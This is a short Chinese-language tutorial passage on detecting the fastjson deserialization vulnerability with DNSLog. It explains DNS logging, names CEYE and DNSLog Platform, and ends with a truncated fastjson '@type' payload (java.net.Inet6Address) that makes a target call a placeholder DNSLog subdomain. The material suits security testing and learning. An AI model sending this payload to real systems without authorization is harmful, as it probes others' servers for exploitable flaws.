35-3 使用dnslog探测fastjson漏洞

一、DNSLog 原理

        DNSLog是一种记录在DNS上的域名相关信息的机制，类似于日志文件，记录了对域名或IP的访问信息。了解多级域名的概念对理解DNSLog至关重要。因特网采用树状结构的命名方法，按照组织结构划分域，每个域都是名字空间中被管理的一个划分，可以进一步划分为子域。域名可以被分为多级，如一级域名、二级域名、三级域名等。从右到左，域名地址依次是顶级域名、二级域名、三级域名。

        举例来说，假设有一个域名kxsy.work，将其解析设置为对应的IP地址2.2.2.2。当向DNS服务器发起kxsy.work的解析请求时，DNSLog会记录下此次解析，包括解析的域名和对应的IP地址。我们可以利用这些记录来进行漏洞测试，这个过程就是DNSLog。

二、在线的 DNSLog 平台

• CEYE - Monitor service for security testing
• DNSLog Platform

之前的文章有讲过这两个平台的使用这里就不多说了

 三、利用 dnslog 测试是否有漏洞

payload

# dnslog 是指你自己的dnslog子域名{"a": {"@type": "java.net.Inet6Address", "val": "dnslog"